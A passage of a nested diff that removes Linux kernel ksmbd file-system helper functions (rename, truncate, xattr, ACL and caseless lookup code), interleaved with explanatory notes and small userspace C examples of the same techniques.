+-		err = vfs_fsync_range(filp, offset, offset + *written, 0);
+-		if (err < 0)
+-			pr_err("fsync failed for filename = %pD, err = %d\n",
+-			       fp->filp, err);
+-	}
+-
+-out:
+-	return err;
+-}
+-
+-/**
+- * ksmbd_vfs_getattr() - vfs helper for smb getattr
+- * @work:	work
+- * @fid:	file id of open file
+- * @attrs:	inode attributes
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int ksmbd_vfs_getattr(const struct path *path, struct kstat *stat)
+-{
+-	int err;
+-
+-	err = vfs_getattr(path, stat, STATX_BTIME, AT_STATX_SYNC_AS_STAT);
+-	if (err)
+-		pr_err("getattr failed, err %d\n", err);
+-	return err;
+-}
+-
+-/**
+- * ksmbd_vfs_fsync() - vfs helper for smb fsync
+- * @work:	work
+- * @fid:	file id of open file
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int ksmbd_vfs_fsync(struct ksmbd_work *work, u64 fid, u64 p_id)
+-{
+-	struct ksmbd_file *fp;
+-	int err;
+-
+-	fp = ksmbd_lookup_fd_slow(work, fid, p_id);
+-	if (!fp) {
+-		pr_err("failed to get filp for fid %llu\n", fid);
+-		return -ENOENT;
+-	}
+-	err = vfs_fsync(fp->filp, 0);
+-	if (err < 0)
+-		pr_err("smb fsync failed, err = %d\n", err);
+-	ksmbd_fd_put(work, fp);
+-	return err;
+-}
+-
+-/**
+- * ksmbd_vfs_remove_file() - vfs helper for smb rmdir or unlink
+- * @name:	directory or file name that is relative to share
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int ksmbd_vfs_remove_file(struct ksmbd_work *work, char *name)
+-{
+-	struct user_namespace *user_ns;
+-	struct path path;
+-	struct dentry *parent;
+-	int err;
+-
+-	if (ksmbd_override_fsids(work))
+-		return -ENOMEM;
+-
+-	err = ksmbd_vfs_kern_path(work, name, LOOKUP_NO_SYMLINKS, &path, false);
+-	if (err) {
+-		ksmbd_debug(VFS, "can't get %s, err %d\n", name, err);
+-		ksmbd_revert_fsids(work);
+-		return err;
+-	}
+-
+-	user_ns = mnt_user_ns(path.mnt);
+-	parent = dget_parent(path.dentry);
+-	err = ksmbd_vfs_lock_parent(user_ns, parent, path.dentry);
+-	if (err) {
+-		dput(parent);
+-		path_put(&path);
+-		ksmbd_revert_fsids(work);
+-		return err;
+-	}
+-
+-	if (!d_inode(path.dentry)->i_nlink) {
+-		err = -ENOENT;
+-		goto out_err;
+-	}
+-
+-	if (S_ISDIR(d_inode(path.dentry)->i_mode)) {
+-		err = vfs_rmdir(user_ns, d_inode(parent), path.dentry);
+-		if (err && err != -ENOTEMPTY)
+-			ksmbd_debug(VFS, "%s: rmdir failed, err %d\n", name,
+-				    err);
+-	} else {
+-		err = vfs_unlink(user_ns, d_inode(parent), path.dentry, NULL);
+-		if (err)
+-			ksmbd_debug(VFS, "%s: unlink failed, err %d\n", name,
+-				    err);
+-	}
+-
+-out_err:
+-	inode_unlock(d_inode(parent));
+-	dput(parent);
+-	path_put(&path);
+-	ksmbd_revert_fsids(work);
+-	return err;
+-}
+-
+-/**
+- * ksmbd_vfs_link() - vfs helper for creating smb hardlink
+- * @oldname:	source file name
+- * @newname:	hardlink name that is relative to share
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int ksmbd_vfs_link(struct ksmbd_work *work, const char *oldname,
+-		   const char *newname)
+-{
+-	struct path oldpath, newpath;
+-	struct dentry *dentry;
+-	int err;
+-
+-	if (ksmbd_override_fsids(work))
+-		return -ENOMEM;
+-
+-	err = kern_path(oldname, LOOKUP_NO_SYMLINKS, &oldpath);
+-	if (err) {
+-		pr_err("cannot get linux path for %s, err = %d\n",
+-		       oldname, err);
+-		goto out1;
+-	}
+-
+-	dentry = ksmbd_vfs_kern_path_create(work, newname,
+-					    LOOKUP_NO_SYMLINKS | LOOKUP_REVAL,
+-					    &newpath);
+-	if (IS_ERR(dentry)) {
+-		err = PTR_ERR(dentry);
+-		pr_err("path create err for %s, err %d\n", newname, err);
+-		goto out2;
+-	}
+-
+-	err = -EXDEV;
+-	if (oldpath.mnt != newpath.mnt) {
+-		pr_err("vfs_link failed err %d\n", err);
+-		goto out3;
+-	}
+-
+-	err = vfs_link(oldpath.dentry, mnt_user_ns(newpath.mnt),
+-		       d_inode(newpath.dentry),
+-		       dentry, NULL);
+-	if (err)
+-		ksmbd_debug(VFS, "vfs_link failed err %d\n", err);
+-
+-out3:
+-	done_path_create(&newpath, dentry);
+-out2:
+-	path_put(&oldpath);
+-out1:
+-	ksmbd_revert_fsids(work);
+-	return err;
+-}
+-
+-static int ksmbd_validate_entry_in_use(struct dentry *src_dent)
+-{
+-	struct dentry *dst_dent;
+-
+-	spin_lock(&src_dent->d_lock);
+-	list_for_each_entry(dst_dent, &src_dent->d_subdirs, d_child) {
+-		struct ksmbd_file *child_fp;
+-
+-		if (d_really_is_negative(dst_dent))
+-			continue;
+-
+-		child_fp = ksmbd_lookup_fd_inode(d_inode(dst_dent));
+-		if (child_fp) {
+-			spin_unlock(&src_dent->d_lock);
+-			ksmbd_debug(VFS, "Forbid rename, sub file/dir is in use\n");
+-			return -EACCES;
+-		}
+-	}
+-	spin_unlock(&src_dent->d_lock);
+-
+-	return 0;
+-}
+-
+-static int __ksmbd_vfs_rename(struct ksmbd_work *work,
+-			      struct user_namespace *src_user_ns,
+-			      struct dentry *src_dent_parent,
+-			      struct dentry *src_dent,
+-			      struct user_namespace *dst_user_ns,
+-			      struct dentry *dst_dent_parent,
+-			      struct dentry *trap_dent,
+-			      char *dst_name)
+-{
+-	struct dentry *dst_dent;
+-	int err;
+-
+-	if (!work->tcon->posix_extensions) {
+-		err = ksmbd_validate_entry_in_use(src_dent);
+-		if (err)
+-			return err;
+-	}
+-
+-	if (d_really_is_negative(src_dent_parent))
+-		return -ENOENT;
+-	if (d_really_is_negative(dst_dent_parent))
+-		return -ENOENT;
+-	if (d_really_is_negative(src_dent))
+-		return -ENOENT;
+-	if (src_dent == trap_dent)
+-		return -EINVAL;
+-
+-	if (ksmbd_override_fsids(work))
+-		return -ENOMEM;
+-
+-	dst_dent = lookup_one(dst_user_ns, dst_name, dst_dent_parent,
+-			      strlen(dst_name));
+-	err = PTR_ERR(dst_dent);
+-	if (IS_ERR(dst_dent)) {
+-		pr_err("lookup failed %s [%d]\n", dst_name, err);
+-		goto out;
+-	}
+-
+-	err = -ENOTEMPTY;
+-	if (dst_dent != trap_dent && !d_really_is_positive(dst_dent)) {
+-		struct renamedata rd = {
+-			.old_mnt_userns	= src_user_ns,
+-			.old_dir	= d_inode(src_dent_parent),
+-			.old_dentry	= src_dent,
+-			.new_mnt_userns	= dst_user_ns,
+-			.new_dir	= d_inode(dst_dent_parent),
+-			.new_dentry	= dst_dent,
+-		};
+-		err = vfs_rename(&rd);
+-	}
+-	if (err)
+-		pr_err("vfs_rename failed err %d\n", err);
+-	if (dst_dent)
+-		dput(dst_dent);
+-out:
+-	ksmbd_revert_fsids(work);
+-	return err;
+-}
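__ksmbd_vfs_rename() only calls vfs_rename() when the destination dentry is negative, i.e. it refuses to rename over an existing name. From userspace the same no-replace guarantee is available atomically via renameat2() (glibc 2.28+; src.txt and dst.txt are placeholder names):

#define _GNU_SOURCE
#include <fcntl.h>		/* AT_FDCWD */
#include <stdio.h>		/* renameat2(), RENAME_NOREPLACE */

int main(void)
{
	if (renameat2(AT_FDCWD, "src.txt", AT_FDCWD, "dst.txt",
		      RENAME_NOREPLACE) < 0)
		perror("renameat2");	/* EEXIST when dst.txt already exists */
	return 0;
}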
+-
+-int ksmbd_vfs_fp_rename(struct ksmbd_work *work, struct ksmbd_file *fp,
+-			char *newname)
+-{
+-	struct user_namespace *user_ns;
+-	struct path dst_path;
+-	struct dentry *src_dent_parent, *dst_dent_parent;
+-	struct dentry *src_dent, *trap_dent, *src_child;
+-	char *dst_name;
+-	int err;
+-
+-	dst_name = extract_last_component(newname);
+-	if (!dst_name) {
+-		dst_name = newname;
+-		newname = "";
+-	}
+-
+-	src_dent_parent = dget_parent(fp->filp->f_path.dentry);
+-	src_dent = fp->filp->f_path.dentry;
+-
+-	err = ksmbd_vfs_kern_path(work, newname,
+-				  LOOKUP_NO_SYMLINKS | LOOKUP_DIRECTORY,
+-				  &dst_path, false);
+-	if (err) {
+-		ksmbd_debug(VFS, "Cannot get path for %s [%d]\n", newname, err);
+-		goto out;
+-	}
+-	dst_dent_parent = dst_path.dentry;
+-
+-	trap_dent = lock_rename(src_dent_parent, dst_dent_parent);
+-	dget(src_dent);
+-	dget(dst_dent_parent);
+-	user_ns = file_mnt_user_ns(fp->filp);
+-	src_child = lookup_one(user_ns, src_dent->d_name.name, src_dent_parent,
+-			       src_dent->d_name.len);
+-	if (IS_ERR(src_child)) {
+-		err = PTR_ERR(src_child);
+-		goto out_lock;
+-	}
+-
+-	if (src_child != src_dent) {
+-		err = -ESTALE;
+-		dput(src_child);
+-		goto out_lock;
+-	}
+-	dput(src_child);
+-
+-	err = __ksmbd_vfs_rename(work,
+-				 user_ns,
+-				 src_dent_parent,
+-				 src_dent,
+-				 mnt_user_ns(dst_path.mnt),
+-				 dst_dent_parent,
+-				 trap_dent,
+-				 dst_name);
+-out_lock:
+-	dput(src_dent);
+-	dput(dst_dent_parent);
+-	unlock_rename(src_dent_parent, dst_dent_parent);
+-	path_put(&dst_path);
+-out:
+-	dput(src_dent_parent);
+-	return err;
+-}
+-
+-/**
+- * ksmbd_vfs_truncate() - vfs helper for smb file truncate
+- * @work:	work
+- * @fid:	file id of old file
+- * @size:	truncate to given size
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int ksmbd_vfs_truncate(struct ksmbd_work *work,
+-		       struct ksmbd_file *fp, loff_t size)
+-{
+-	int err = 0;
+-	struct file *filp;
+-
+-	filp = fp->filp;
+-
+-	/* Do we need to break any of a levelII oplock? */
+-	smb_break_all_levII_oplock(work, fp, 1);
+-
+-	if (!work->tcon->posix_extensions) {
+-		struct inode *inode = file_inode(filp);
+-
+-		if (size < inode->i_size) {
+-			err = check_lock_range(filp, size,
+-					       inode->i_size - 1, WRITE);
+-		} else {
+-			err = check_lock_range(filp, inode->i_size,
+-					       size - 1, WRITE);
+-		}
+-
+-		if (err) {
+-			pr_err("failed due to lock\n");
+-			return -EAGAIN;
+-		}
+-	}
+-
+-	err = vfs_truncate(&filp->f_path, size);
+-	if (err)
+-		pr_err("truncate failed, err %d\n", err);
+-	return err;
+-}
+-
+-/**
+- * ksmbd_vfs_listxattr() - vfs helper for smb list extended attributes
+- * @dentry:	dentry of file for listing xattrs
+- * @list:	destination buffer
+- * @size:	destination buffer length
+- *
+- * Return:	xattr list length on success, otherwise error
+- */
+-ssize_t ksmbd_vfs_listxattr(struct dentry *dentry, char **list)
+-{
+-	ssize_t size;
+-	char *vlist = NULL;
+-
+-	size = vfs_listxattr(dentry, NULL, 0);
+-	if (size <= 0)
+-		return size;
+-
+-	vlist = kvmalloc(size, GFP_KERNEL | __GFP_ZERO);
+-	if (!vlist)
+-		return -ENOMEM;
+-
+-	*list = vlist;
+-	size = vfs_listxattr(dentry, vlist, size);
+-	if (size < 0) {
+-		ksmbd_debug(VFS, "listxattr failed\n");
+-		kvfree(vlist);
+-		*list = NULL;
+-	}
+-
+-	return size;
+-}
+-
+-static ssize_t ksmbd_vfs_xattr_len(struct user_namespace *user_ns,
+-				   struct dentry *dentry, char *xattr_name)
+-{
+-	return vfs_getxattr(user_ns, dentry, xattr_name, NULL, 0);
+-}
+-
+-/**
+- * ksmbd_vfs_getxattr() - vfs helper for smb get extended attributes value
+- * @user_ns:	user namespace
+- * @dentry:	dentry of file for getting xattrs
+- * @xattr_name:	name of xattr name to query
+- * @xattr_buf:	destination buffer xattr value
+- *
+- * Return:	read xattr value length on success, otherwise error
+- */
+-ssize_t ksmbd_vfs_getxattr(struct user_namespace *user_ns,
+-			   struct dentry *dentry,
+-			   char *xattr_name, char **xattr_buf)
+-{
+-	ssize_t xattr_len;
+-	char *buf;
+-
+-	*xattr_buf = NULL;
+-	xattr_len = ksmbd_vfs_xattr_len(user_ns, dentry, xattr_name);
+-	if (xattr_len < 0)
+-		return xattr_len;
+-
+-	buf = kmalloc(xattr_len + 1, GFP_KERNEL);
+-	if (!buf)
+-		return -ENOMEM;
+-
+-	xattr_len = vfs_getxattr(user_ns, dentry, xattr_name,
+-				 (void *)buf, xattr_len);
+-	if (xattr_len > 0)
+-		*xattr_buf = buf;
+-	else
+-		kfree(buf);
+-	return xattr_len;
+-}
+-
+-/**
+- * ksmbd_vfs_setxattr() - vfs helper for smb set extended attributes value
+- * @user_ns:	user namespace
+- * @dentry:	dentry to set XATTR at
+- * @name:	xattr name for setxattr
+- * @value:	xattr value to set
+- * @size:	size of xattr value
+- * @flags:	destination buffer length
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int ksmbd_vfs_setxattr(struct user_namespace *user_ns,
+-		       struct dentry *dentry, const char *attr_name,
+-		       void *attr_value, size_t attr_size, int flags)
+-{
+-	int err;
+-
+-	err = vfs_setxattr(user_ns,
+-			   dentry,
+-			   attr_name,
+-			   attr_value,
+-			   attr_size,
+-			   flags);
+-	if (err)
+-		ksmbd_debug(VFS, "setxattr failed, err %d\n", err);
+-	return err;
+-}
+-
+-/**
+- * ksmbd_vfs_set_fadvise() - convert smb IO caching options to linux options
+- * @filp:	file pointer for IO
+- * @options:	smb IO options
+- */
+-void ksmbd_vfs_set_fadvise(struct file *filp, __le32 option)
+-{
+-	struct address_space *mapping;
+-
+-	mapping = filp->f_mapping;
+-
+-	if (!option || !mapping)
+-		return;
+-
+-	if (option & FILE_WRITE_THROUGH_LE) {
+-		filp->f_flags |= O_SYNC;
+-	} else if (option & FILE_SEQUENTIAL_ONLY_LE) {
+-		filp->f_ra.ra_pages = inode_to_bdi(mapping->host)->ra_pages * 2;
+-		spin_lock(&filp->f_lock);
+-		filp->f_mode &= ~FMODE_RANDOM;
+-		spin_unlock(&filp->f_lock);
+-	} else if (option & FILE_RANDOM_ACCESS_LE) {
+-		spin_lock(&filp->f_lock);
+-		filp->f_mode |= FMODE_RANDOM;
+-		spin_unlock(&filp->f_lock);
+-	}
+-}
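ksmbd_vfs_set_fadvise() maps SMB create options onto kernel readahead and write-through state. The nearest userspace knob is posix_fadvise(); a sketch of the same three-way mapping, with the OPT_* bits as illustrative stand-ins for the SMB option flags used above:

#include <fcntl.h>

#define OPT_WRITE_THROUGH	0x1	/* illustrative stand-ins */
#define OPT_SEQUENTIAL_ONLY	0x2
#define OPT_RANDOM_ACCESS	0x4

static void apply_io_hint(int fd, unsigned int option)
{
	if (option & OPT_SEQUENTIAL_ONLY)
		posix_fadvise(fd, 0, 0, POSIX_FADV_SEQUENTIAL);	/* grow readahead */
	else if (option & OPT_RANDOM_ACCESS)
		posix_fadvise(fd, 0, 0, POSIX_FADV_RANDOM);	/* drop readahead */
	/* write-through has no fadvise analogue; open with O_SYNC instead,
	 * which mirrors the O_SYNC branch the kernel helper takes */
}

int main(void)
{
	int fd = open("demo.txt", O_RDONLY | O_CREAT, 0600);

	if (fd >= 0)
		apply_io_hint(fd, OPT_SEQUENTIAL_ONLY);
	return 0;
}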
+-
+-int ksmbd_vfs_zero_data(struct ksmbd_work *work, struct ksmbd_file *fp,
+-			loff_t off, loff_t len)
+-{
+-	smb_break_all_levII_oplock(work, fp, 1);
+-	if (fp->f_ci->m_fattr & FILE_ATTRIBUTE_SPARSE_FILE_LE)
+-		return vfs_fallocate(fp->filp,
+-				     FALLOC_FL_PUNCH_HOLE | FALLOC_FL_KEEP_SIZE,
+-				     off, len);
+-
+-	return vfs_fallocate(fp->filp,
+-			     FALLOC_FL_ZERO_RANGE | FALLOC_FL_KEEP_SIZE,
+-			     off, len);
+-}
+-
+-int ksmbd_vfs_fqar_lseek(struct ksmbd_file *fp, loff_t start, loff_t length,
+-			 struct file_allocated_range_buffer *ranges,
+-			 unsigned int in_count, unsigned int *out_count)
+-{
+-	struct file *f = fp->filp;
+-	struct inode *inode = file_inode(fp->filp);
+-	loff_t maxbytes = (u64)inode->i_sb->s_maxbytes, end;
+-	loff_t extent_start, extent_end;
+-	int ret = 0;
+-
+-	if (start > maxbytes)
+-		return -EFBIG;
+-
+-	if (!in_count)
+-		return 0;
+-
+-	/*
+-	 * Shrink request scope to what the fs can actually handle.
+-	 */
+-	if (length > maxbytes || (maxbytes - length) < start)
+-		length = maxbytes - start;
+-
+-	if (start + length > inode->i_size)
+-		length = inode->i_size - start;
+-
+-	*out_count = 0;
+-	end = start + length;
+-	while (start < end && *out_count < in_count) {
+-		extent_start = vfs_llseek(f, start, SEEK_DATA);
+-		if (extent_start < 0) {
+-			if (extent_start != -ENXIO)
+-				ret = (int)extent_start;
+-			break;
+-		}
+-
+-		if (extent_start >= end)
+-			break;
+-
+-		extent_end = vfs_llseek(f, extent_start, SEEK_HOLE);
+-		if (extent_end < 0) {
+-			if (extent_end != -ENXIO)
+-				ret = (int)extent_end;
+-			break;
+-		} else if (extent_start >= extent_end) {
+-			break;
+-		}
+-
+-		ranges[*out_count].file_offset = cpu_to_le64(extent_start);
+-		ranges[(*out_count)++].length =
+-			cpu_to_le64(min(extent_end, end) - extent_start);
+-
+-		start = extent_end;
+-	}
+-
+-	return ret;
+-}
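ksmbd_vfs_fqar_lseek() enumerates a file's allocated ranges by alternating SEEK_DATA and SEEK_HOLE until lseek reports ENXIO. The identical walk works from userspace; a sketch that prints every allocated extent of a possibly sparse file:

#define _GNU_SOURCE		/* SEEK_DATA / SEEK_HOLE */
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

int main(int argc, char **argv)
{
	int fd = open(argc > 1 ? argv[1] : "sparse.bin", O_RDONLY);
	off_t data = 0, hole;

	if (fd < 0)
		return 1;
	for (;;) {
		data = lseek(fd, data, SEEK_DATA);
		if (data < 0)
			break;		/* ENXIO: no data past this offset */
		hole = lseek(fd, data, SEEK_HOLE);
		if (hole < 0)
			break;
		printf("data: [%lld, %lld)\n",
		       (long long)data, (long long)hole);
		data = hole;		/* resume the scan after this extent */
	}
	close(fd);
	return 0;
}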
+-
+-int ksmbd_vfs_remove_xattr(struct user_namespace *user_ns,
+-			   struct dentry *dentry, char *attr_name)
+-{
+-	return vfs_removexattr(user_ns, dentry, attr_name);
+-}
+-
+-int ksmbd_vfs_unlink(struct user_namespace *user_ns,
+-		     struct dentry *dir, struct dentry *dentry)
+-{
+-	int err = 0;
+-
+-	err = ksmbd_vfs_lock_parent(user_ns, dir, dentry);
+-	if (err)
+-		return err;
+-	dget(dentry);
+-
+-	if (S_ISDIR(d_inode(dentry)->i_mode))
+-		err = vfs_rmdir(user_ns, d_inode(dir), dentry);
+-	else
+-		err = vfs_unlink(user_ns, d_inode(dir), dentry, NULL);
+-
+-	dput(dentry);
+-	inode_unlock(d_inode(dir));
+-	if (err)
+-		ksmbd_debug(VFS, "failed to delete, err %d\n", err);
+-
+-	return err;
+-}
+-
+-static bool __dir_empty(struct dir_context *ctx, const char *name, int namlen,
+-		       loff_t offset, u64 ino, unsigned int d_type)
+-{
+-	struct ksmbd_readdir_data *buf;
+-
+-	buf = container_of(ctx, struct ksmbd_readdir_data, ctx);
+-	buf->dirent_count++;
+-
+-	return buf->dirent_count <= 2;
+-}
+-
+-/**
+- * ksmbd_vfs_empty_dir() - check for empty directory
+- * @fp:	ksmbd file pointer
+- *
+- * Return:	true if directory empty, otherwise false
+- */
+-int ksmbd_vfs_empty_dir(struct ksmbd_file *fp)
+-{
+-	int err;
+-	struct ksmbd_readdir_data readdir_data;
+-
+-	memset(&readdir_data, 0, sizeof(struct ksmbd_readdir_data));
+-
+-	set_ctx_actor(&readdir_data.ctx, __dir_empty);
+-	readdir_data.dirent_count = 0;
+-
+-	err = iterate_dir(fp->filp, &readdir_data.ctx);
+-	if (readdir_data.dirent_count > 2)
+-		err = -ENOTEMPTY;
+-	else
+-		err = 0;
+-	return err;
+-}
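ksmbd_vfs_empty_dir() counts directory entries and treats anything beyond the two mandatory "." and ".." entries as contents. The same two-entry rule with readdir():

#include <dirent.h>
#include <stdio.h>

static int dir_is_empty(const char *path)
{
	DIR *d = opendir(path);
	int count = 0;

	if (!d)
		return -1;
	while (readdir(d)) {
		if (++count > 2)	/* anything past "." and ".." */
			break;
	}
	closedir(d);
	return count <= 2;		/* 1 = empty, 0 = not empty */
}

int main(void)
{
	printf("empty: %d\n", dir_is_empty("."));
	return 0;
}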
+-
+-static bool __caseless_lookup(struct dir_context *ctx, const char *name,
+-			     int namlen, loff_t offset, u64 ino,
+-			     unsigned int d_type)
+-{
+-	struct ksmbd_readdir_data *buf;
+-	int cmp = -EINVAL;
+-
+-	buf = container_of(ctx, struct ksmbd_readdir_data, ctx);
+-
+-	if (buf->used != namlen)
+-		return true;
+-	if (IS_ENABLED(CONFIG_UNICODE) && buf->um) {
+-		const struct qstr q_buf = {.name = buf->private,
+-					   .len = buf->used};
+-		const struct qstr q_name = {.name = name,
+-					    .len = namlen};
+-
+-		cmp = utf8_strncasecmp(buf->um, &q_buf, &q_name);
+-	}
+-	if (cmp < 0)
+-		cmp = strncasecmp((char *)buf->private, name, namlen);
+-	if (!cmp) {
+-		memcpy((char *)buf->private, name, namlen);
+-		buf->dirent_count = 1;
+-		return false;
+-	}
+-	return true;
+-}
+-
+-/**
+- * ksmbd_vfs_lookup_in_dir() - lookup a file in a directory
+- * @dir:	path info
+- * @name:	filename to lookup
+- * @namelen:	filename length
+- *
+- * Return:	0 on success, otherwise error
+- */
+-static int ksmbd_vfs_lookup_in_dir(const struct path *dir, char *name,
+-				   size_t namelen, struct unicode_map *um)
+-{
+-	int ret;
+-	struct file *dfilp;
+-	int flags = O_RDONLY | O_LARGEFILE;
+-	struct ksmbd_readdir_data readdir_data = {
+-		.ctx.actor	= __caseless_lookup,
+-		.private	= name,
+-		.used		= namelen,
+-		.dirent_count	= 0,
+-		.um		= um,
+-	};
+-
+-	dfilp = dentry_open(dir, flags, current_cred());
+-	if (IS_ERR(dfilp))
+-		return PTR_ERR(dfilp);
+-
+-	ret = iterate_dir(dfilp, &readdir_data.ctx);
+-	if (readdir_data.dirent_count > 0)
+-		ret = 0;
+-	fput(dfilp);
+-	return ret;
+-}
+-
+-/**
+- * ksmbd_vfs_kern_path() - lookup a file and get path info
+- * @name:	file path that is relative to share
+- * @flags:	lookup flags
+- * @path:	if lookup succeed, return path info
+- * @caseless:	caseless filename lookup
+- *
+- * Return:	0 on success, otherwise error
+- */
+-int ksmbd_vfs_kern_path(struct ksmbd_work *work, char *name,
+-			unsigned int flags, struct path *path, bool caseless)
+-{
+-	struct ksmbd_share_config *share_conf = work->tcon->share_conf;
+-	int err;
+-
+-	flags |= LOOKUP_BENEATH;
+-	err = vfs_path_lookup(share_conf->vfs_path.dentry,
+-			      share_conf->vfs_path.mnt,
+-			      name,
+-			      flags,
+-			      path);
+-	if (!err)
+-		return 0;
+-
+-	if (caseless) {
+-		char *filepath;
+-		struct path parent;
+-		size_t path_len, remain_len;
+-
+-		filepath = kstrdup(name, GFP_KERNEL);
+-		if (!filepath)
+-			return -ENOMEM;
+-
+-		path_len = strlen(filepath);
+-		remain_len = path_len;
+-
+-		parent = share_conf->vfs_path;
+-		path_get(&parent);
+-
+-		while (d_can_lookup(parent.dentry)) {
+-			char *filename = filepath + path_len - remain_len;
+-			char *next = strchrnul(filename, '/');
+-			size_t filename_len = next - filename;
+-			bool is_last = !next[0];
+-
+-			if (filename_len == 0)
+-				break;
+-
+-			err = ksmbd_vfs_lookup_in_dir(&parent, filename,
+-						      filename_len,
+-						      work->conn->um);
+-			path_put(&parent);
+-			if (err)
+-				goto out;
+-
+-			next[0] = '\0';
+-
+-			err = vfs_path_lookup(share_conf->vfs_path.dentry,
+-					      share_conf->vfs_path.mnt,
+-					      filepath,
+-					      flags,
+-					      &parent);
+-			if (err)
+-				goto out;
+-			else if (is_last) {
+-				*path = parent;
+-				goto out;
+-			}
+-
+-			next[0] = '/';
+-			remain_len -= filename_len + 1;
+-		}
+-
+-		path_put(&parent);
+-		err = -EINVAL;
+-out:
+-		kfree(filepath);
+-	}
+-	return err;
+-}
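The caseless branch of ksmbd_vfs_kern_path() resolves a path one component at a time, scanning each directory for a case-insensitive match and patching the on-disk spelling back into the buffer. One step of that walk from userspace, with readdir() in place of iterate_dir() and plain strcasecmp() standing in for the unicode-aware comparison:

#include <dirent.h>
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* find the on-disk spelling of `want` inside `dirpath`; 0 on success */
static int caseless_component(const char *dirpath, const char *want,
			      char *found, size_t found_len)
{
	DIR *d = opendir(dirpath);
	struct dirent *de;
	int rc = -1;

	if (!d)
		return -1;
	while ((de = readdir(d))) {
		if (!strcasecmp(de->d_name, want)) {
			snprintf(found, found_len, "%s", de->d_name);
			rc = 0;		/* e.g. "README" for "readme" */
			break;
		}
	}
	closedir(d);
	return rc;
}

int main(void)
{
	char real[256];

	if (!caseless_component(".", "readme", real, sizeof(real)))
		printf("on-disk spelling: %s\n", real);
	return 0;
}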
+-
+-struct dentry *ksmbd_vfs_kern_path_create(struct ksmbd_work *work,
+-					  const char *name,
+-					  unsigned int flags,
+-					  struct path *path)
+-{
+-	char *abs_name;
+-	struct dentry *dent;
+-
+-	abs_name = convert_to_unix_name(work->tcon->share_conf, name);
+-	if (!abs_name)
+-		return ERR_PTR(-ENOMEM);
+-
+-	dent = kern_path_create(AT_FDCWD, abs_name, path, flags);
+-	kfree(abs_name);
+-	return dent;
+-}
+-
+-int ksmbd_vfs_remove_acl_xattrs(struct user_namespace *user_ns,
+-				struct dentry *dentry)
+-{
+-	char *name, *xattr_list = NULL;
+-	ssize_t xattr_list_len;
+-	int err = 0;
+-
+-	xattr_list_len = ksmbd_vfs_listxattr(dentry, &xattr_list);
+-	if (xattr_list_len < 0) {
+-		goto out;
+-	} else if (!xattr_list_len) {
+-		ksmbd_debug(SMB, "empty xattr in the file\n");
+-		goto out;
+-	}
+-
+-	for (name = xattr_list; name - xattr_list < xattr_list_len;
+-	     name += strlen(name) + 1) {
+-		ksmbd_debug(SMB, "%s, len %zd\n", name, strlen(name));
+-
+-		if (!strncmp(name, XATTR_NAME_POSIX_ACL_ACCESS,
+-			     sizeof(XATTR_NAME_POSIX_ACL_ACCESS) - 1) ||
+-		    !strncmp(name, XATTR_NAME_POSIX_ACL_DEFAULT,
+-			     sizeof(XATTR_NAME_POSIX_ACL_DEFAULT) - 1)) {
+-			err = ksmbd_vfs_remove_xattr(user_ns, dentry, name);
+-			if (err)
+-				ksmbd_debug(SMB,
+-					    "remove acl xattr failed : %s\n", name);
+-		}
+-	}
+-out:
+-	kvfree(xattr_list);
+-	return err;
+-}
+-
+-int ksmbd_vfs_remove_sd_xattrs(struct user_namespace *user_ns,
+-			       struct dentry *dentry)
+-{
+-	char *name, *xattr_list = NULL;
+-	ssize_t xattr_list_len;
+-	int err = 0;
+-
+-	xattr_list_len = ksmbd_vfs_listxattr(dentry, &xattr_list);
+-	if (xattr_list_len < 0) {
+-		goto out;
+-	} else if (!xattr_list_len) {
+-		ksmbd_debug(SMB, "empty xattr in the file\n");
+-		goto out;
+-	}
+-
+-	for (name = xattr_list; name - xattr_list < xattr_list_len;
+-			name += strlen(name) + 1) {
+-		ksmbd_debug(SMB, "%s, len %zd\n", name, strlen(name));
+-
+-		if (!strncmp(name, XATTR_NAME_SD, XATTR_NAME_SD_LEN)) {
+-			err = ksmbd_vfs_remove_xattr(user_ns, dentry, name);
+-			if (err)
+-				ksmbd_debug(SMB, "remove xattr failed : %s\n", name);
+-		}
+-	}
+-out:
+-	kvfree(xattr_list);
+-	return err;
+-}
+-
+-static struct xattr_smb_acl *ksmbd_vfs_make_xattr_posix_acl(struct user_namespace *user_ns,
+-							    struct inode *inode,
+-							    int acl_type)
+-{
+-	struct xattr_smb_acl *smb_acl = NULL;
+-	struct posix_acl *posix_acls;
+-	struct posix_acl_entry *pa_entry;
+-	struct xattr_acl_entry *xa_entry;
+-	int i;
+-
+-	if (!IS_ENABLED(CONFIG_FS_POSIX_ACL))
+-		return NULL;
+-
+-	posix_acls = get_acl(inode, acl_type);
+-	if (!posix_acls)
+-		return NULL;
+-
+-	smb_acl = kzalloc(sizeof(struct xattr_smb_acl) +
+-			  sizeof(struct xattr_acl_entry) * posix_acls->a_count,
+-			  GFP_KERNEL);
+-	if (!smb_acl)
+-		goto out;
+-
+-	smb_acl->count = posix_acls->a_count;
+-	pa_entry = posix_acls->a_entries;
+-	xa_entry = smb_acl->entries;
+-	for (i = 0; i < posix_acls->a_count; i++, pa_entry++, xa_entry++) {
+-		switch (pa_entry->e_tag) {
+-		case ACL_USER:
+-			xa_entry->type = SMB_ACL_USER;
+-			xa_entry->uid = posix_acl_uid_translate(user_ns, pa_entry);
+-			break;
+-		case ACL_USER_OBJ:
+-			xa_entry->type = SMB_ACL_USER_OBJ;
+-			break;
+-		case ACL_GROUP:
+-			xa_entry->type = SMB_ACL_GROUP;
+-			xa_entry->gid = posix_acl_gid_translate(user_ns, pa_entry);
+-			break;
+-		case ACL_GROUP_OBJ:
+-			xa_entry->type = SMB_ACL_GROUP_OBJ;
+-			break;
+-		case ACL_OTHER:
+-			xa_entry->type = SMB_ACL_OTHER;
+-			break;
+-		case ACL_MASK:
+-			xa_entry->type = SMB_ACL_MASK;
+-			break;
+-		default:
+-			pr_err("unknown type : 0x%x\n", pa_entry->e_tag);
+-			goto out;
+-		}
+-
+-		if (pa_entry->e_perm & ACL_READ)
+-			xa_entry->perm |= SMB_ACL_READ;
+-		if (pa_entry->e_perm & ACL_WRITE)
+-			xa_entry->perm |= SMB_ACL_WRITE;
+-		if (pa_entry->e_perm & ACL_EXECUTE)
+-			xa_entry->perm |= SMB_ACL_EXECUTE;
+-	}
+-out:
